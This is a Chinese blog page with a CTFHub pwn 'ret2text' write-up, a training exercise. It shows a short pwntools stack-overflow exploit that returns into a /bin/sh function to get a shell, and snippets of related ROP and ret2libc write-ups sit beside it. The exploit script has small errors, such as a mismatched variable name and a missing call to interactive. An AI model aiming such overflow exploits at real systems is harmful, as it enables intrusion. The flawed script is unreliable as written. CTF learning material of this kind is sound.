CTFHUB(PWN)Ret2Text

最新推荐文章于 2024-08-01 19:15:28 发布

Rt1Text

最新推荐文章于 2024-08-01 19:15:28 发布

阅读量4.3k

点赞数 3

文章标签：安全 pwn

本文链接：https://blog.youkuaiyun.com/arraylocalhost/article/details/122772158

版权

本文探讨了在64位程序中发现的栈溢出漏洞，通过IDA64分析发现gets函数不设长度限制。作者详细介绍了如何定位bin_sh函数地址，构造payload并使用pwn库进行远程攻击，最后演示了交互式shell获取flag的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

3
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ret2text

Power_shell的博客

03-25

510

Shellcode可以放到bss段然后去执行我们的shell可以控制好几段位置不相邻的代码（gadgets），用rop技术随着nx保护技术的开启，往堆栈写代码的方式已经发挥不了效果 Rop：Return-oriented Programming（面向返回的编程）在缓冲区溢出的基础上利用程序已有的小片段，来改变我们程序寄存器变量的值，从而达到控制程序执行流程的效果所以gadgets是以ret...

跟着CTF-wiki学pwn——ret2text

qq_42882717的博客

06-21

1338

肾么叫做万死不辞呀，就是每天被气死一万次，也不辞职…(哭哭

2 条评论您还未登录，请先登录后发表或查看评论

【PWN · ret2text】——[CTFHub]ret2text

Mr_Fmnwon的博客

04-20

3395

经典的ret2text流程。

[CTFHub] ret2text

Lucien_Carr的博客

04-14

896

gets_s（buffer,size）函数：从标准输入中读取数据，size表示的最多读取的数量，在这里是argv，没有定义是多大，所以我们就可以无限的输入。输入超过程序设定的字节数以后，就会发生栈溢出，多出的内容会覆盖返回地址。这个题目中要获得系统的shell，只需要先用垃圾数据填充填满数组的空间，再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8（“/bin/sh”指令的地址），就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权（也就是拿到shell）。

CTFhub-pwn-[ret2text]-writeup

m0_43405474的博客

08-26

1916

关于CTF pwn的简单入门题目，ret2text。

CTFhub 技能树 PWN ret2text Python3 exp

break_cat的博客

11-17

1248

题目链接：https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP：https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了，于是就Cirl+CV，发现原程序是用Python2写的，我的pwntools环境是Python3，因此程序需要稍作修改。 from pwn import * h

CTFhub pwn

清霂的博客

02-04

1423

这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞，题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口，找到/bin/sh 点进去，选中/bin/sh，右键，交叉引用列表（可以找到使用/bin/sh的地方）看到把/bin/sh放入rdi后，调用了system x64，64位系统中rdi，rsi，rdx，rcx，r8，r9作为调用函数的前6个参数，如果参数多于6

[PWN] CTF-WIKI ret2text

qq_46441427的博客

02-06

596

ret2text 首先我们打开题目，checksec一下，主要是查看一下该程序是多少位的，并了解其保护机制 32位的小端位程序，没有开启canary堆栈保护及NX，于是我们用32位ida打开我们打开ida-32，看到源码，发现了一个get函数，这属于我们常说的危险函数在函数框，我们找到了一个secure函数，调出来，发现有一个system("/bin/sh")函数这个时候，我们只需要知道调用system函数的指令的地址，然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst

ctf wiki pwn ret2libc

最新发布

03-01

### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术，在这种技术下，攻击者通过覆盖返回地址来调用系统中的现有函数（通常是`system()`），从而执行任意命令。当面对静态链接的二进制文件时...

[CTF]PWN--新人入门第一关--Ret2libc

2301_79880752的博客

02-29

1622

首先我们需要找到pop rdi|ret这个指令在程序中的位置（前面提到该指令为程序中自带的，只不过需要我们去寻找），然后让程序返回到pop rdi|ret这个指令上去执行它，通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址，其中ROPgadget为一个插件，需要自己下载，binary意思为一个二进制文件，后面跟着的是文件名，only后面跟着的为要搜索的命令地址。

CTFHub 栈溢出 ret2text exp代码

柠檬i的博客

10-09

2013

CTFHub 栈溢出 ret2text exp代码

ctfhub 技能树pwn 栈溢出 ret2text

m0_75234353的博客

03-29

925

看到v4这个变量的缓冲区，我们要把数据溢出到覆盖返回地址，即0x70+8。选中该行，看到下方的地址（4007B8）看到gets危险函数，再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入：wq 保存退出。

[CTFHub]ret2text-入土为安的第十二天

lzx13290757580的博客

08-01

251

ida fn+ F5 main 点(_int64)v4。v大小为0x70+栈基指针0x8+返回地址。

CTFHUB-PWN-ret2text

m0_64180167的博客

04-16

191

然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。

pwn ret2text

小龙在线

09-12

754

首先把ret2text用IDA打开： 64位ELF文件。进入main函数，F5反编译，双击vulnerable函数，进入：发现溢出点。函数窗口列表，查看success，发现shell：进入IDA普通视图，双击左侧success函数，查看success地址，是400566。写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.

ctfhub pwn

m0_63253040的博客

09-09

347

被ida演了一波，gets不给参数，**********************给了system('/bin/sh')位置是0x4007B8。后来重新打开一遍就有了。

CTFpwn:ret2text,mprotece,shellcode,自动化rop链

2302_79813730的博客

01-25

1097

text:0000000000401324 75 EA jnz short loc_401310 #对比rbp里的值与rbx里的值，如果相同就继续运行程序，如果不同就返回0x401310。先将栈溢出的返回地址填成0x40132A，将需要的数据依次填入栈顶，依次弹入寄存器中，随后在执行到0x401334，retn返回的时候将返回地址填成0x401310，这样，我们就可以控制edi，rsi，rdx里的值，并调用write函数泄露基址。

CTFHub pwn [FastBin Attack]

saulgoodman的博客

01-29

576

【代码】CTFHub pwn [FastBin Attack]